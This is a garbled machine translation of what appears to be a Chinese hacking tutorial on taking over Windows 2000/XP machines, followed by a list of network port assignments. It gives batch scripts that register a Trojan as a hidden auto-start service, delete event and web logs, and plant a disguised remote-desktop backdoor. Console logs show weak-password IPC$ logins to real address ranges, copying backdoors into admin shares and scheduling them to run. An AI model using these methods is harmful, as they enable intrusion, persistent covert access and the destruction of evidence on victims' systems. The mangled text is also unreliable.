We are now in use in some of the older horse, possibly in the registry of the [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (Runonce, Runservices, Runexec)] to generate a key to realization of auto-starting. but this is very easy to expose Trojan path, resulting in the killing of Trojans are, by contrast, if the Trojan program is registered as a system service, some are relatively safe. Below to configure a good example to IRC Trojan DSNX (named windrv32.. Exe). .


@start windrv32。.exe 。.


@ Attrib + h + r windrv32. . Exe. .


@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 。.


>> Patch. . Dll. .


@echo “windsnx “=- >>patch。.dll 。.


@ Sc. . Exe create Windriversrv type = kernel start = auto displayname =. .


WindowsDriver binpath= c:\winnt\system32\windrv32。.exe 。.


@ Regedit / s patch. . Dll. .


@delete patch。.dll 。.


@ REM [remove DSNXDE startup entries in the registry with sc. . Exe will be registered for the system critical services, while its property set to hidden and read-only, and the config to start automatically]. .


@ REM do not safer ^ _ ^.


6. . Wonderful examples of delivery. .


1. Remove win2k/xp systems the default shared batch.


-------- Cut here then save as. . Bat or. . Cmd file. .


————————— 。.


@ Echo preparing to delete all the default shares. . When ready pres any key. .


@pause 。.


@ Echo off. .


:Rem check parameters if null show usage。.


if (% 1 }=={} goto: Usage. .


:Rem code start。.


echo. .


echo —————————————————— 。.


echo. .


echo Now deleting all the default shares。.


echo. .


net share %1$ /delete 。.


net share% 2 $ / delete. .


net share %3$ /delete 。.


net share% 4 $ / delete. .


net share %5$ /delete 。.


net share% 6 $ / delete. .


net share %7$ /delete 。.


net share% 8 $ / delete. .


net share %9$ /delete 。.


net stop Server. .


net start Server 。.


echo. .


echo All the shares have been deleteed 。.


echo. .


echo —————————————————— 。.


echo. .


echo Now modify the registry to change the system default properties。.


echo. .


echo Now creating the registry file 。.


echo Windows Registry Editor Version 5. .00> C: \ delshare. . Reg. .


echo 。.


[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ lanmanserver \ parameters]>>. .


c:\delshare。.reg 。.


echo "AutoShareWks" = dword: 00000000>> c: \ delshare. . Reg. .


echo “AutoShareServer”=dword:00000000>> c:\delshare。.reg 。.


echo Nowing using the registry file to chang the system default. .


properties。.


regedit / sc: \ delshare. . Reg. .


echo Deleting the temprotarily files。.


del c: \ delshare. . Reg. .


goto :END 。.


: Usage. .


echo。.


echo ------------------. .


echo。.


echo ☆ A example for batch file ☆. .


echo ☆ [Use batch file to change the sysytem share properties。.] ☆ 。.


echo. .


echo Author:Ex4rch 。.


echo Mail: Ex4rch @ hotmail. . Com QQ: 1672602. .


echo。.


echo Error: Not enough parameters. .


echo。.


echo ☆ Please enter the share disk you wanna delete ☆. .


echo。.


echo For instance, to delete the default shares:. .


echo delshare c d e ipc admin print 。.


echo. .


echo If the disklable is not as C: D: E: ,Please chang it youself。.


echo. .


echo example: 。.


echo If locak disklable are C: D: E: X: Y: Z:, you should chang the. .


command into : 。.


echo delshare cdexyz ipc admin print. .


echo。.


echo *** you can delete nine shares once in a useing ***. .


echo。.


echo ------------------. .


goto :EOF 。.


: END. .


echo。.


echo ------------------. .


echo。.


echo OK, delshare. . Bat has deleted all the share you assigned. .


echo。.Any questions ,feel free to mail to Ex4rch@hotmail。.com。.


echo. .


echo。.


echo ------------------. .


echo。.


: EOF. .


echo end of the batch file 。.


-------- Cut here then save as. . Bat or. . Cmd file. .


————————— 。.


2. . Comprehensive reinforcement system (for chicken patched) the batch file. .


———————— cut here then save as 。.bat or 。.cmd file 。.


---------. .


@echo Windows Registry Editor Version 5。.00 >patch。.dll 。.


@ Echo. .


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] 。.


>> Patch. . Dll. .


@echo “AutoShareServer”=dword:00000000 >>patch。.dll 。.


@ Echo "AutoShareWks" = dword: 00000000>> patch. . Dll. .


@ REM [prohibit sharing].


@ Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Lsa]. .


>>patch。.dll 。.


@ Echo "restrictanonymous" = dword: 00000001>> patch. . Dll. .


@ REM [prohibiting anonymous login].


@ Echo. .


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] 。.


>> Patch. . Dll. .


@echo “SMBDeviceEnabled”=dword:00000000 >>patch。.dll 。.


@ REM [Prohibition and file access and Print Sharing]. .


@echo 。.


[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ @ REMoteRegistry]. .


>>patch。.dll 。.


@ Echo "Start" = dword: 00000004>> patch. . Dll. .


@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule] 。.


>> Patch. . Dll. .


@echo “Start”=dword:00000004 >>patch。.dll 。.


@ Echo [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows. .


NT\CurrentVersion\Winlogon] >>patch。.dll 。.


@ Echo "ShutdownWithoutLogon" = "0">> patch. . Dll. .


@ REM [disable logons to be shut down].


@ Echo "DontDisplayLastUserName" = "1">> patch. . Dll. .


@ REM [suppresses the display of the previous logon user name].


@ Regedit / s patch. . Dll. .


———————— cut here then save as 。.bat or 。.cmd file 。.


---------. .


The following command is to clear all logs in broilers, the prohibition of some danger, and modify the broiler terminnal service remain after jump..


@ Regedit / s patch. . Dll. .


@net stop w3svc 。.


@ Net stop event log. .


@del c:\winnt\system32\logfiles\w3svc1\*。.* /f /q 。.


@ Del c: \ winnt \ system32 \ logfiles \ w3svc2 \ *. .* / F / q. .


@del c:\winnt\system32\config\*。.event /f /q 。.


@ Del c: \ winnt \ system32dtclog \ *. .* / F / q. .


@del c:\winnt\*。.txt /f /q 。.


@ Del c: \ winnt \ *. . Log / f / q. .


@net start w3svc 。.


@ Net start event log. .


@ Rem [deletion log].


@ Net stop lanmanserver / y. .


@net stop Schedule /y 。.


@ Net stop RemoteRegistry / y. .


@del patch。.dll 。.


@ Echo The server has been patched, Have fun. .


@del patch。.bat 。.


@ REM [ban some dangerous service. ]. .


@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal 。.


Server \ WinStations \ RDP-Tcp]>> patch. . Dll. .


@echo “PortNumber”=dword:00002010 >>patch。.dll 。.


@ Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal. .


Server\Wds\rdpwd\Tds\tcp >>patch。.dll 。.


@ Echo "PortNumber" = dword: 00002012>> patch. . Dll. .


@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] 。.


>> Patch. . Dll. .


@echo “Start”=dword:00000002 >>patch。.dll 。.


@ Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ SecuService]. .


>>patch。.dll 。.


@ Echo "Start" = dword: 00000002>> patch. . Dll. .


@echo “ErrorControl”=dword:00000001 >>patch。.dll 。.


@ Echo. .


“ImagePath”=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ 。.


>> Patch. . Dll. .


@echo 。.


74,00,25,00,5 c, 00,53,00,79,00,73,00,74,00,65,00,6 d, 00,33,00,32,00,5 c, 00,65, \. .


>>patch。.dll 。.


@ Echo. .


00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 。.


>> Patch. . Dll. .


@echo “ObjectName”=”LocalSystem” >>patch。.dll 。.


@ Echo "Type" = dword: 00000010>> patch. . Dll. .


@echo “Description”=”Keep record of the program and windows’ message。 ” 。.


>> Patch. . Dll. .


@echo “DisplayName”=”Microsoft EventLog” >>patch。.dll 。.


@ Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ termservice]. .


>>patch。.dll 。.


@ Echo "Start" = dword: 00000004>> patch. . Dll. .


@copy c:\winnt\system32\termsrv。.exe c:\winnt\system32\eventlog。.exe 。.


@ REM [revised 3389 connection, port 8210 (hex is 00002012), the name for the Microsoft EventLog, left a posterior]. .


Open 3389 Terminal method and FAQ.


The first method:. .


Use tool:.


1: ipcscan scanner. .


2: the Terminal Services connection tool xpts. .exe (WIN 2000/XP Terminal Connection procedures. attached COPY file patch.. format IP: Port).


3: Open the Terminal script rots. . Vbs (Gray Track zzzevazzz works). .


4: cscript (in system32 folder; 98 operating system might not be.


2: Steps:. .


1: use a weak password ipcscan scan (you can sweep, I sweep to some weak password host. retrieving real time on a forum I relapsed).


2: rots. . Vbs open the Terminal Services. .


Description of the cscript ROTS. .vbs.


<目标IP> <用户名> <密码>[Service-port] [automatic restart option]. .


Cscript. .exe format rots. .vbs ip port/r user userpass.


Or cscript. . Exe rots. . Vbs ip user userpass port / fr. .


III: frequently asked questions:.


1: The script will determine the target system type, if not the server and above, it will prompt you whether you want to cancel. Because the pro version can not install Terminal Services. . If you are sure to judge the script error, continue to be installed. .


2: possible: Conneting .202.202.. .202 ... .202. .Error .Error0× 80070776. description: this is not specified, this object export or give it up.


3: could not connect, please use this form 127. .0. .0. .1:1818 1818 is just to open ports. .


The second method:.


After entering: TELNET up! . .


c:\>echo [Components] > c:\rock 。.


c: \> echo TSEnable = on>> c: \ rock. .


c:\>sysocmgr /i:c:\winnt\inf\sysoc。.inf /u:c:\rock /q 。.


Or! . .


c:\>echo [Components] > d:\wawa 。.


c: \> echo TSEnable = on>> d: \ wawa. .


c:\>sysocmgr /i:c:\winnt\inf\sysoc。.inf /u:d:\wawa /q 。.


And so will be automatically activated after the OK. .


Or:.


Edit using DOS commands in the local establishment. . Bat batch file suffix (file name at random) echo [Components]> c: \ sql. .


echo TSEnable = on >> 。.


c: \ sqlsysocmgr / i: c: \ winnt \ inf \ sysoc. . Inf / u: c: \ sql / q. .


Net use \\ip address/user \ipc $ password: user name (typically the default: administrator).


Use at time for each other server time. .


Copy path: .bat \\ip address \xxx. \ $ c:\winnt.


at time 00:00:00 xxx. . Bat. .


The server executes the command, the server restarts, make use of 3389 landing on OK!.


Third method:. .


To enter, check again whether the installation: Terminal components.


c: \> query user. .


The tools you need to install Terminal Services.


This will further determine the component is not installed. . If the return:. .


USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME 。.


> W1 console 0 running. . 2002-1-12 22:5. .


\\ Information like this, it may be component installed.


Good! Are clear, you can start installation. .


————————————————— 。.


C: \> dir c: \ sysoc. . Inf / s file: / / check the INF file. .


C:\WINNT\inf directory.


2000-01-10 20:00 3,770 sysoc. . Inf. .


1 file 3,770 bytes.


------------------. .


C:\ > dir c:\sysocmgr. */s file://check component installer.


c: \ WINNT \ system32 directory. .


2000-01-10 20:00 42,768 sysocmgr。.exe 。.


A file 42,768 bytes. .


—————————————————– 。.


c: \> echo [Components]> c: \ rock. .


c:\>echo TSEnable = on >> c:\rock 。.


file: / / This is set up unattended installation parameters. .


c:\>type c:\rock 。.


[Components]. .


TSEnable = on 。.


file: / / check the parameter file. .


—————————————————— 。.


c: \> sysocmgr / i: c: \ winnt \ inf \ sysoc. . Inf / u: c: \ rock / q. .


—————————————————– 。.


This one is really an order to install components. .


The above command with no parameters, host/R after the installation is automatically reset.


Should the increase of the / R parameter host will not reboot. .


If all is well, a few minutes later the other hosts will be offline, when it came back, again.


3389 Terminal Services is turned on. . You can even go up. .


Questions and suggestions:.


A during the installation process, do not use / R, and sometimes the host will not reboot, you have to manually re-starting him, but in use, such as: iisreset / reboot command, the other side. .


Screen will appear a dialog box that says who caused this time it is started, restart many seconds.


B No one can try again, was very effective in practice. .


C enter the command to start the installation sysocmgr, be sure not to put the command parameter mismatched, on the other side of the dialog box appears, a large, is the help, I'm sysocmgr is conspicuous,.


And asked to identify. . In your screen will not have any reaction, you will not know wrong, so there will be B's proposal. .


The fourth method:.


C: \ Documents and Settings \ shanlu. . XZGJDOMAIN> net use \ \ 218. .22. .155. .* \ Ipc $ "" / us. .


Er: administrator — — — — —-connection success!.


The command completed successfully. .


C:\Documents and Settings\shanlu。.XZGJDOMAIN>copy wollf。.exe \\218。.22。.155。.*\admi 。.


n $---------- copy wollf. . Exe to the target computer's admin $ directory. .


1 file has been copied.


C: \ Documents and Settings \ shanlu. . XZGJDOMAIN> copy hbulot. . Exe \ \ 218. .22. .155. .* \ Adm. .


In $ — — — — — — — — — – copy hbulot. .exe to the target computer's admin $ directory.


Copied a file. .


C:\Documents and Settings\shanlu。.XZGJDOMAIN>net time \\218。.22。.155。.* 。.


\ \ 218. .22. .155. .* The current time is 2002/12/1 06:37 AM. .


The command completed successfully.


C: \ Documents and Settings \ shanlu. . XZGJDOMAIN> at \ \ 218. .22. .155. .* 06:39 wollf. . Exe. .


New added a job, the job ID = 1 – specify the wollf. .exe running at 06: 39.


------------------. .


Description:.


wollf. . Exe is a backdoor program, many masters like nc or winshell, but I have a soft spot for him! Here I describe this article. .


If the command parameter, it's not added advanced usage.


hbulot. . Exe is used to open the 3389 service, if not the server and above, do not run. Because the pro version can not install Terminal Services. .


After 2 minutes ....


-----------------. .


C:\Documents and Settings\shanlu。.XZGJDOMAIN>wollf -connect 218。.22。.155。.* 7614 。.


"Wollf Remote Manager" v1. .6. .


Code by wollf, http://www。.xfocus。.org 。.


-----------------. .


Description:.


Use wollf connection to note wollf. . Exe in the current directory, and its connection command format: wollf-connect IP 7614. .


7614 is wollf open ports. If the displayed above, you have the connection is successful, and have administrator permissions on the administrator.


------------------. .


[server@D:\WINNT\system32]#dos 。.


Microsoft Windows 2000 [Version 5. .00. .2195]. .


(C) Copyright 1985-2000 Microsoft Corp.


------------------. .


Description:.


Enter dos, you will enter the target machine cmd, the time also has administrator privileges. .


—————————————————- 。.


D: \ WINNT \ system32> cd. .


cd。.


D: \ WINNT> dir h *. .*. .


dir h*。.* 。.


Drive D, the volume is not tags. .


Volume serial number is 1CE5-2615.


D: \ WINNT directory. .


2002-11-27 03: 07.


Help. .


2002-09-10 12:16 10,752 hh。.exe 。.


2002-10-01 08:29 24,576 HBULOT. . Exe. .


2 files 35,328 bytes.


A directory 9,049,604,096 bytes available. .


D:\WINNT>hbulot 。.


hbulot. .


————————————————— 。.


Description:. .


Because we put the .exe into HBULOT. target machine admin $, so first find it, the above is the location of the file.


D: \ WINNT> exit. .


exit 。.


Command "DOS" succeed. .


[server@D:\WINNT\system32]#reboot 。.


Command "REBOOT" succeed. .


[server@D:\WINNT\system32]# 。.


Connection closed. .


———————————————— 。.


Description:. .


By dos to wollf connection mode using the exit command, run the .exe HBULOT. after reboot before it can take effect, REBOOT with the wollf.


Command, performed in 5 seconds you will lose connection. After the 3389 start to check the port is open, many ways, superscan3 sweep. .


At this time you can login. If there are no open 3389 that is not a server and above versions, do not run. Because of the Pro version can not be installed.


Terminal Services. .


Here, you've got 3389 broiler! but will not be other intruders? teach below is how lets 3389 just for you!.


We now use the 3389 lander, there are two versions, one is 2000/98, one is XP. Both the difference? The former uses the default port 3389 right. .


Objective, which is the default port is 3389, but it also supports other ports connect! so … let's modify the connection port 3389.


To escape the ordinary scanner scans! Amended as follows:. .


Modify the server port settings, registry has 2 parts need to be modified.


[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp]. .


PortNumber value, the default is 3389, modify as desired port, such as 1314.


Second place:. .


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]  。.


PortNumber value, the default is 3389, modified to the desired port, such as 1314. .


Now you can. Restart the system.


Note: In fact, the only modification is also possible the second office. In addition, the Second Department of the standard connection should be. .


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\。.



That a specific RDP-TCP connection. .


After the restart to see if the port has changed.


Tip: Modify the registry keys, first select the 10 band, enter the port number you want, then select the 16 band, the system will automatically convert. .


The fifth method:.


1. . Principles of basic installation. .


1. the following registry key to import the "meat" of the registry:.


-------------. .


Windows Registry Editor Version 5。.00 。.


[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ netcache]. .


“Enabled”=”0″ 。.


[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon]. .


“ShutdownWithoutLogon”=”0″ 。.


[HKEY_LOCAL_MACHINE \ SOFTWARE \ Policies \ Microsoft \ Windows \ Installer]. .


“EnableAdminTSRemote”=dword:00000001 。.


[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server]. .


“TSEnabled”=dword:00000001 。.


[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ TermDD]. .


“Start”=dword:00000002 。.


[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ TermService]. .


“Start”=dword:00000002 。.


[HKEY_USERS \. . DEFAULT \ Keyboard Layout \ Toggle]. .


“Hotkey”=”1″ 。.


----. .


2. restart "meat machine".


3. . To use the local 3398 clients to connect "meat machines." .


4. superior (lack of) point:.


A. . "Meat machine" in "Control Panel -> Add / Remove Programs -> Add / Remove Windows Components -> Terminal Services" is still not installed state. .


B。.” Meat machines, "" Start – > Programs – > Administrative Tools "without any changes.


C. . "Meat machine" in "Start -> Programs -> Administrative Tools -> Services -> Terminal Services" to "are starting" and "automatic." .


D。.” Meat machines, "" Windows Task Manager > processes "– to increase the" .exe "Termsrv...


5. . And "sysocmgr / iysoc.. Inf / u: u.. Txt / q": For. .


A。.” Meat machines, "" Control Panel-> Add/Remove Programs – > Add/Remove Windows Components – > Terminal Services "in the installed state.


B. . "Meat machine" in "Start -> Programs -> Administrative Tools" increase "Terminal Services Manager", "Terminal Services Configuration" and "Terminal Services Client Creator." .


C。.” Meat machines, "" start – > programs – > tools – > service management – > Terminal Services "becomes" starting "and" automatic ".


D. . "Meat machine" in the "Windows Task Manager -> Process", the increase in "Termsrv.. Exe". .


E.-needs to be copied several megabytes of files to the "meat".


2. . Start a discussion of "hidden" installation:. .


1. the "meat machines," ".exe" file c:\winnt\system32\termsrv. make a backup, named the ".exe" eventlog., place it into the directory "c:\winnt\system32\".


2. . The following registry key into the "meat machine" of the registry:. .


———— 。.


Windows Registry Editor Version 5. .00. .


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] 。.


"Enabled" = "0". .


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 。.


"ShutdownWithoutLogon" = "0". .


[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] 。.


"EnableAdminTSRemote" = dword: 00000001. .


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] 。.


"TSEnabled" = dword: 00000001. .


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] 。.


"Start" = dword: 00000002. .


[HKEY_USERS\。.DEFAULT\Keyboard Layout\Toggle] 。.


"Hotkey" = "1". .


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] 。.


"Start" = dword: 00000002. .


“ErrorControl”=dword:00000001 。.


"ImagePath" = hex (2): 25,00,53,00,79,00,73,00,74,00,65,00,6 d, 00,52,00,6 f, 00,6 f, 00, \ . .


74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ 。.


00,76,00,65,00,6 e, 00,74,00,6 c, 00,6 f, 00,67,00,2 e, 00,65,00,78,00,65,00,00,00. .


“ObjectName”=”LocalSystem” 。.


"Type" = dword: 00000010. .


“Description”=”Microsoft” 。.


"DisplayName" = "Microsoft". .


————— 。.


3. . To re-start "the meat machine." .


4. use the local connection to the client, 3398 "meat machine".


5. . Excellent (lack) of:. .


A。.” Meat machines, "" Control Panel-> Add/Remove Programs – > Add/Remove Windows Components – > Terminal Services "is still in the State is not installed.


B. . "Meat machine" in "Start -> Programs -> Administrative Tools" without any changes. .


C。.” Meat machines, "" start – > programs – > tools – > service management – > Terminal Services "does not change, preserving the original state.


D. . "Meat machine" in "Start -> Programs -> Administrative Tools -> services" increased "Microsoft". .


E。.” Meat machines, "" Windows Task Manager > processes "– to increase the" .exe "eventlog...


3. . Theoretical Introduction. .


So simple? Only modify the registry? You do not need to copy the source files for W2k?.


Let us start with a command-line statement, this statement is: "sysocmgr / iysoc.. Inf / u: u.. Txt / q". . Which u. . Txt is as follows:. .


————- 。.


[Components]. .


TsEnable = on 。.


-----. .


First of all recognizing ".inf" sysoc... " Sysoc. .inf "is a setup information file that is located in the" c:\winnt\inf. ". Open it in the "[Components] section, locate the" and "Terminal Services" related entries:.


"TerminalServices = TsOc.. Dll, HydraOc, TsOc.. Inf,, 2". .


Here one setup information files: ".inf" TsOc... This file is also located in the "c:\winnt\inf.".


Open this file, you will find, as the software Anzhuang 下 windows environment, "Terminal Services" installation, 也 consists of three main: copy source files, register DLL and modify the registry. .


In the [TerminalServices. .FreshInstall] section and the "Sections" portion of the File, you will find the "Terminal Services" and the required system files, DLLs and drivers, along with the initial installation, W2k have been safely in place.


Why is "Terminal Services" conventional installation and command line installation have to copy the source file W2k? In fact, the copy is "Terminal Services" client software, both the "Start -> Programs -> Administrative Tools -> Terminal Services Client Builder "Build customer floppy documents required. .


Members of the "black friends" with packages or tools, including the source files of W2k, all beginning with "tsc32". Connected "TsOc. .inf File" and "Sections" section and another file ".inf" c:\winnt\inf\layout., you will be confirmed.


"Terminal Services" installation, need to register both a "DLL". . Maybe has a "DLL" early on to live in the same system, surely they must also have ID cards. .


".Inf" file TsOc. half of the content is about modifying the registry. But the "Terminal Services" need "Reg. .AddToFreshInstall, Reg, Reg. .AddTo50. .AddTo40" are in the system installation is registered.


We look back at what the command line statement, "/ u:" parameter behind the unattended installation information file "u.. Txt". . "TsEnable = on"?. .


".Inf" file TsOc. [Optional Components] section has three options, "TerminalServices", "", "TSClients TSEnable.".


"TerminalServices" As noted above, the initial installation the system has been on the order. . "TSClients" and "Terminal Services" has no direct relation. .


Our ".inf" TsOc. find "[TsEnable]" section. This section useful information there is only one "ToggleOnSection = .ToggleOn TerminalServices..." Then go to [TerminalServices. .ToggleOn] section.


[TerminalServices. . ToggleOn] section tells us that the next stop is the "Reg.. ToggleOn", along the trail, we came to [Reg. . ToggleOn], you see?. .


Description: commonly used ports.


Before re-introducing port, a look at the port of basic know. .


1. recognized port (Well Known Ports): from 0 to 1023 is closely bound to them some of the services. Usually these ports communication clearly indicates a service agreement. For example, port 80 is always HTTP communication.


2. . Registered port (Registered Ports): from 1024 to 49,151. They are loosely bound to some services. There are many services that bind to these ports, these ports are also used for many other purposes. For example: many systems dealing with dynamic ports from around 1024. .


3. Dynamic and/or private ports (Dynamic and/or Private Ports): from 49152 65535. In theory, should not be allocated to these ports. In fact, the machine usually has assigned a dynamic port 1024. But there are exceptions: SUN RPC port from 32768.


1 tcpmux TCP Port Service Multiplexer Transmission Control Protocol port service multiplexer switch selector. .


Management Utility compressnet 2 Management utility compressnet.


3 compressnet Compression Process compression process. .


Remote Job Entry rje 5 remote job log.


7 echo Echo Echo. .


9 discard Discard discard.


11 systat Active Users online users. .


13 daytime Daytime hours.


17 qotd Quote of the Day Daily Journal. .


Message Send Protocol msp 18 message send Protocol.


19 chargen Character Generator Character Generator. .


20 ftp-data File Transfer [Default Data] file transfer protocol (the default data port).


21 ftp File Transfer [Control] File Transfer Protocol (control). .


22 ssh SSH Remote Login Protocol SSH remote login Protocol.


23 telnet Telnet terminal emulation protocol. .


24? Any private mail system reserved for private messaging system.


25 smtp Simple Mail Transfer Protocol Simple Mail sent. .


27 nsw-fe NSW User System FE NSW user system field engineer.


29 msg-icp MSG ICP MSG ICP. .


31 msg-auth MSG MSG to verify Authentication.


33 dsp Display Support Protocol display support agreement. .


35? Any private printer server is reserved for personal printer services.


37 time Time time. .


38 Route Access Protocol rap routing protocol.


39 rlp Resource Location Protocol Resource Location Protocol. .


41 graphics Graphics graphics.


42 nameserver WINS Host Name Server WINS host name service. .


43 nicname Who Is "nickname" who is service.


44 mpm-flags MPM FLAGS Protocol MPM (Message Processing Module) sign the agreement. .


45 mpm Message Processing Module [recv] message processing module.


46 mpm-snd MPM [default send] a message processing module (default send port). .


47 ni-ftp NI FTP             NI FTP 。.


48 auditd Digital Audit Daemon back digital audio services. .


49 Login Host Protocol tacacs (TACACS) login host protocol TACACS.


50 re-mail-ck Remote Mail Checking Protocol Remote Mail check agreement. .


51 la-maint IMP IMP Logical Address Maintenance (interface information processor) logical address maintenance.


52 xns-time XNS Time Protocol Xerox Network Time Protocol service system. .


53 domain Domain Name Server domain name server.


54 xns-ch XNS Clearinghouse Xerox Network Service System clearing. .


55 isi-gl ISI Graphics Language ISI graphics language.


56 xns-auth XNS Authentication Xerox network services system validation. .


57? Any private terminal access reserved for personal use Terminal access.


58 xns-mail XNS Mail Xerox Network Service System messages. .


59? Any private file service to reserve your personal files.


60? Unassigned undefined. .


61 ni-mail NI NI MAIL messages?.


62 acas ACA Services asynchronous communications adapter service. .


63 whois+ whois+              WHOIS+ 。.


64 covia Communications Integrator (CI) communication interface. .


65 tacacs-ds TACACS-Database TACACS-database service Service.


66 sql * net Oracle SQL * NET Oracle SQL * NET. .


67 bootps Bootstrap Protocol Server boot protocol service.


68 bootpc Bootstrap Protocol Client Bootstrap Protocol client. .


69 tftp Trivial File Transfer small file transfer protocol.


70 gopher Gopher information retrieval protocol. .


71 netrjs-1 Remote Job Service remote job service.


72 netrjs-2 Remote Job Service Remote Job Service. .


73 netrjs-3 Remote Job Service remote job service.


74 netrjs-4 Remote Job Service Remote Job Service. .


75? Any private dial out service reserved for personal dial-out service.


76 deos Distributed External Object Store distributed external object store. .


77? Any private RJE service reserved for personal remote job entry services.


78 vettcp vettcp modified TCP?. .


79 finger Finger FINGER (query remote host online users, etc).


80 http World Wide Web HTTP World Wide Web Hypertext Transfer Protocol. .


81 hosts2-ns HOSTS2 Name Server name HOST2.


82 xfer XFER Utility transmission utility. .


83 mit-ml-dev MIT ML Device modular intelligent Terminal ML device.


84 ctf Common Trace Facility to track equipment public. .


85 mit-ml-dev MIT ML Device modular intelligent Terminal ML device.


86 mfcobol Micro Focus Cobol Micro Focus Cobol programming language. .


87? Any private terminal link terminal connection reserved for individuals.


88 kerberos Kerberos Kerberros security authentication system. .


89 su-mit-tg SU/MIT Telnet Gateway SU/MIT terminal emulation gateway.


90 dnsix DNSIX Securit Attribute Token Map DNSIX security attribute tag map. .


91 mit-dov MIT Dover Spooler MIT Dover spooler.


92 npp Network Printing Protocol Internet Printing Protocol. .


93 Device Control Protocol dcp device control protocol.


94 objcall Tivoli Object Dispatcher Tivoli object scheduling. .


95 supdup SUPDUP             。.


96 dixie DIXIE Protocol Specification DIXIE Protocol Specification. .


97 swift-rvf Remote Virtural File Protocol Swift fast remote virtual file protocol.


98 tacnews TAC News TAC (Tokyo University, the computer automatically?) News agreements. .


99 metagram Metagram Relay        。.


101/tcp hostname NIC Host Name Server. .


102/tcp iso-tsap ISO-TSAP Class 0 。.


103/tcp gppitnp Genesis Point-to-Point Trans Net. .


104/tcp acr-nema ACR-NEMA Digital Imag。. & Comm。. 300.


105/tcp cso CCSO name server protocol. .


105/tcp csnet-ns Mailbox Name Nameserver 。.


106/tcp 3com-tsmux 3COM-TSMUX. .


107/tcp rtelnet Remote Telnet Service 。.


108/tcp snagas SNA Gateway Access Server. .


109/tcp pop2 Post Office Protocol – Version 2 。.


110/tcp pop3 Post Office Protocol - Version 3. .


111/tcp sunrpc SUN Remote Procedure Call 。.


112/tcp mcidas McIDAS Data Transmission Protocol. .


113/tcp ident 。.


114/tcp audionews Audio News Multicast. .


115/tcp sftp Simple File Transfer Protocol 。.


116/tcp ansanotify ANSA REX Notify. .


117/tcp uucp-path UUCP Path Service 。.


118/tcp sqlserv SQL Services. .


119/tcp nntp Network News Transfer Protocol 。.


120/tcp cfdptkt CFDPTKT. .


121/tcp erpc Encore Expedited Remote Pro。.Call 。.


122/tcp smakynet SMAKYNET. .


123/tcp ntp Network Time Protocol 。.


124/tcp ansatrader ANSA REX Trader. .


125/tcp locus-map Locus PC-Interface Net Map Ser 。.


126/tcp unitary Unisys Unitary Login. .


127/tcp locus-con Locus PC-Interface Conn Server 。.


128/tcp gss-xlicen GSS X License Verification. .


129/tcp pwdgen Password Generator Protocol 。.


130/tcp cisco-fna cisco FNATIVE. .


131/tcp cisco-tna cisco TNATIVE 。.


132/tcp cisco-sys cisco SYSMAINT. .


133/tcp statsrv Statistics Service 。.


134/tcp ingres-net INGRES-NET Service. .


135/tcp epmap DCE endpoint resolution 。.


136/tcp profile PROFILE Naming System. .


137/tcp netbios-ns NETBIOS Name Service 。.


138/tcp netbios-dgm NETBIOS Datagram Service. .


139/tcp netbios-ssn NETBIOS Session Service 。.


140/tcp emfis-data EMFIS Data Service. .


141/tcp emfis-cntl EMFIS Control Service 。.


142/tcp bl-idm Britton-Lee IDM. .


143/tcp imap Internet Message Access Protocol 。.


144/tcp uma Universal Management Architecture. .


145/tcp uaac UAAC Protocol 。.


146/tcp iso-tp0 ISO-IP0. .


147/tcp iso-ip ISO-IP 。.


148/tcp jargon Jargon. .


149/tcp aed-512 AED 512 Emulation Service 。.


150/tcp sql-net SQL-NET. .


151/tcp hems HEMS 。.


152/tcp bftp Background File Transfer Program. .


153/tcp sgmp SGMP 。.


154/tcp netsc-prod NETSC. .


155/tcp netsc-dev NETSC 。.


156/tcp sqlsrv SQL Service. .


157/tcp knet-cmp KNET/VM Command/Message Protocol 。.


158/tcp pcmail-srv PCMail Server. .


159/tcp nss-routing NSS-Routing 。.


160/tcp sgmp-traps SGMP-TRAPS. .


161/tcp snmp SNMP 。.


